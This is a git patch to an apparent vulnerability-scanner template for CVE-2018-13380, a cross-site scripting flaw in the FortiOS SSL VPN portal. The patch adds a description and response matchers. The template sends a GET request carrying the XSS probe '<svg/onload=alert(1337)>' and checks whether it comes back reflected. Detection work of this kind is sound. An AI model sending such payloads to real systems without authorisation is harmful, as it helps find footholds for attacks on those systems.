From 6f3b2cdd0c27188a841308bfcfcb75fc83649194 Mon Sep 17 00:00:00 2001
From: bauthard <8293321+bauthard@users.noreply.github.com>
Date: Wed, 25 Nov 2020 01:30:01 +0530
Subject: [PATCH] adding more info and matchers

---
 cves/CVE-2018-13380.yaml | 15 +++++++++++++++
 1 file changed, 15 insertions(+)

diff --git a/cves/CVE-2018-13380.yaml b/cves/CVE-2018-13380.yaml
index 735a7d02d5..21e17dc4d5 100644
--- a/cves/CVE-2018-13380.yaml
+++ b/cves/CVE-2018-13380.yaml
@@ -4,13 +4,28 @@ info:
   name: Fortinet FortiOS Cross-Site Scripting
   author: shelld3v
   severity: medium
+  description: A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal allows attacker to execute unauthorized malicious script code via the error or message handling parameters.
+  type: XSS
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2018-13380
 
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/message?title=x&msg=%26%23<svg/onload=alert(1337)>"
+
+    matchers-condition: and
     matchers:
       - type: word
         words:
           - "<svg/onload=alert(1337)>"
         part: body
+
+      - type: word
+        words:
+          - "application/json"
+        part: header
+        negative: true
+
+      - type: status
+        status:
+          - 200
\ No newline at end of file